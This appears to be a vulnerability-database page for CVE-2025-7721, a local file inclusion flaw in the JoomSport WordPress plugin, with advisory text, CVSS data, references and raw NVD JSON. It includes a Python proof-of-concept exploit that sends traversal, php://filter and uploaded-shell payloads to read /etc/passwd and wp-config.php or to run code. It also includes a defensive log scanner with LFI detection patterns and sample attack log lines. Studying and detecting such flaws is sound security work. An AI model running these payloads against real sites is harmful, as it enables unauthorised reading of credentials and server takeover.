Security Vulnerability Report
CVE-2025-7721 CVSS 9.8 CRITICAL

CVE-2025-7721

Published: 2025-10-03 12:15:45
Last Modified: 2026-04-15 00:35:42

Description

The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.7.3 via the task parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is published for this CVE; the affected range below is taken from the advisory text.

JoomSport – for Sports: Team & League, Football, Hockey & more <= 5.7.3 (fixed in the plugin changeset listed under References)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-7721 - JoomSport LFI PoC
# Vulnerability: Local File Inclusion via the 'task' parameter
# Affected: JoomSport plugin <= 5.7.3
import requests

# Target WordPress site with the JoomSport plugin installed
target_url = "http://target-wordpress-site.com"

# The vulnerable code lives in sportleague/base/wordpress/classes/class-jsport-controller.php
# (see the plugins.trac.wordpress.org reference). The 'task' parameter reaches an
# include without proper validation. This PoC requests the controller file directly;
# whether that path executes stand-alone depends on the deployment, so point the
# request at wherever the plugin reads 'task' on the target.
# Caveat: the advisory says only .php files can be included, which suggests a ".php"
# suffix is appended to the value; if so, payloads 1 and 2 will not return data as written.
CONTROLLER = (
    "/wp-content/plugins/joomsport-sports-league-results-management"
    "/sportleague/base/wordpress/classes/class-jsport-controller.php"
)

# Exploit 1: Local File Inclusion using directory traversal
payload_traversal = "../../../../../../../etc/passwd"
lfi_url_traversal = f"{target_url}{CONTROLLER}?task={payload_traversal}"

# Exploit 2: PHP filter to read source code (base64 encoded)
payload_filter = "php://filter/convert.base64-encode/resource=../../../../wp-config.php"
lfi_url_filter = f"{target_url}{CONTROLLER}?task={payload_filter}"

# Exploit 3: Include a previously uploaded PHP shell (if file upload is available)
payload_rce = "../../../../uploads/malicious_shell.php"
lfi_url_rce = f"{target_url}{CONTROLLER}?task={payload_rce}"


def exploit_lfi(url, description):
    """Send the LFI exploit request and print a preview of the response."""
    print(f"[*] Attempting: {description}")
    print(f"[*] URL: {url}")
    try:
        response = requests.get(url, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        print(f"[*] Response Preview: {response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-7721 - JoomSport LFI Exploit")
    print("=" * 60)
    exploit_lfi(lfi_url_traversal, "Directory Traversal LFI")
    print()
    exploit_lfi(lfi_url_filter, "PHP Filter LFI (Base64)")
    print()
    exploit_lfi(lfi_url_rce, "RCE via uploaded PHP shell")
```
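The following Python is an added example, not code from the advisory or the JoomSport project. It covers the two things a practitioner wants next to a CWE-98 report like this one: a log-triage pass that flags `task=` values carrying directory traversal, PHP stream wrappers, null bytes or absolute paths (decoding repeatedly so double-encoded payloads surface), and the allowlist check that closes the weakness class. It does not assume a specific request path, because the advisory does not name the entry point, and the task names in ALLOWED_TASKS and the access-log lines are constructed for the example.

```python
# Added example for CVE-2025-7721 (not the plugin's code): detect LFI attempts on
# the 'task' parameter in access logs, and show the allowlist check that closes CWE-98.
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators for abuse of a parameter that reaches include()/require().
TRAVERSAL = re.compile(r"(\.\./|\.\.\\)")
WRAPPER = re.compile(r"^(php|data|phar|expect|file|zip|glob)://", re.I)
NULL_BYTE = "\x00"

# Hypothetical allowlist of task names; the real plugin's task set is not on the page.
ALLOWED_TASKS = frozenset({"standings", "results", "calendar"})


def decode_param(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%252e%252e%252f) are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_safe_task(task: str, allowed: frozenset = ALLOWED_TASKS) -> bool:
    """Allowlist check: the value must be a plain identifier AND an explicitly known task.
    Mapping a validated name to a file is what replaces include($_GET['task'])."""
    return bool(re.fullmatch(r"[a-z][a-z0-9_]{0,31}", task)) and task in allowed


def classify_task(raw: str) -> Optional[str]:
    """Return an indicator name if the decoded task value looks like an LFI payload."""
    value = decode_param(raw)
    if NULL_BYTE in value:
        return "null-byte"
    if WRAPPER.search(value):
        return "stream-wrapper"
    if TRAVERSAL.search(value):
        return "traversal"
    if value.startswith("/"):
        return "absolute-path"
    return None


# Combined log format: ip - - [timestamp] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def scan_log(lines: Iterable[str]) -> List[Tuple[str, str, str, str]]:
    """Return (ip, timestamp, indicator, decoded_task) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, _method, path, _status = m.groups()
        query = urlsplit(path).query
        # parse_qs decodes one layer; decode_param handles any further layers.
        for raw in parse_qs(query, keep_blank_values=True).get("task", []):
            kind = classify_task(raw)
            if kind:
                hits.append((ip, ts, kind, decode_param(raw)))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [03/Oct/2025:12:20:01 +0000] "GET /?task=../../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.10 - - [03/Oct/2025:12:20:02 +0000] "GET /?task=php://filter/convert.base64-encode/resource=wp-config HTTP/1.1" 200 6011
203.0.113.11 - - [03/Oct/2025:12:21:07 +0000] "GET /?task=%252e%252e%252fwp-content%252fuploads%252fshell HTTP/1.1" 500 0
198.51.100.7 - - [03/Oct/2025:12:22:30 +0000] "GET /?task=standings&sid=3 HTTP/1.1" 200 9120
198.51.100.8 - - [03/Oct/2025:12:23:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100
"""

if __name__ == "__main__":
    for ip, ts, kind, task in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ts} {ip} {kind:14s} task={task!r}")
```

The scanner keys on the parameter rather than a URL path, so it works regardless of how the plugin is reached; tighten it to the plugin's real entry point once that is confirmed on your deployment. `is_safe_task` is the shape of a fix, not a claim about what changeset 3371353 does: validate against a fixed set of names, then map the name to a file, and never pass the raw value to include.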

References

https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/trunk/sportleague/base/wordpress/classes/class-jsport-controller.php#L74
https://plugins.trac.wordpress.org/changeset/3371353/
https://www.wordfence.com/threat-intel/vulnerabilities/id/4f3900c7-2acb-4031-9854-b0b13e172e1f?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-7721",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2025-10-03T12:15:44.640",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.7.3 via the task parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-98"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/trunk/sportleague/base/wordpress/classes/class-jsport-controller.php#L74",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3371353/",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4f3900c7-2acb-4031-9854-b0b13e172e1f?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}
```